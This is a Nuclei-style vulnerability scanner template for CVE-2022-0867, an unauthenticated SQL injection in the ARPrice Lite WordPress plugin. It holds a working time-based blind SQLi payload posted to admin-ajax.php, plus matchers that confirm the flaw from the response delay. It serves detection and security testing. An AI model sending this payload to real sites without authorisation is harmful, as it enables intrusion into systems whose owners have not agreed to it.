id: CVE-2022-0867

info:
  name: ARPrice Lite < 3.6.1 - Unauthenticated SQLi
  author: theamanrawat
  severity: critical
  description: |
    The Pricing Table WordPress plugin before 3.6.1 fails to properly sanitize and escape user supplied POST data before it is being interpolated in an SQL statement and then executed via an AJAX action available to unauthenticated users.
  reference:
    - https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494
    - https://wordpress.org/plugins/arprice-responsive-pricing-table/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0867
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0867
    cwe-id: CWE-89
  metadata:
    verified: "true"
  tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve

requests:
  - raw:
      - |
        @timeout: 10s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)

      - |
        GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'status_code_1 == 200'
          - 'contains(content_type_1, "text/html")'
          - 'contains(body_2, "ArpPriceTable")'
        condition: and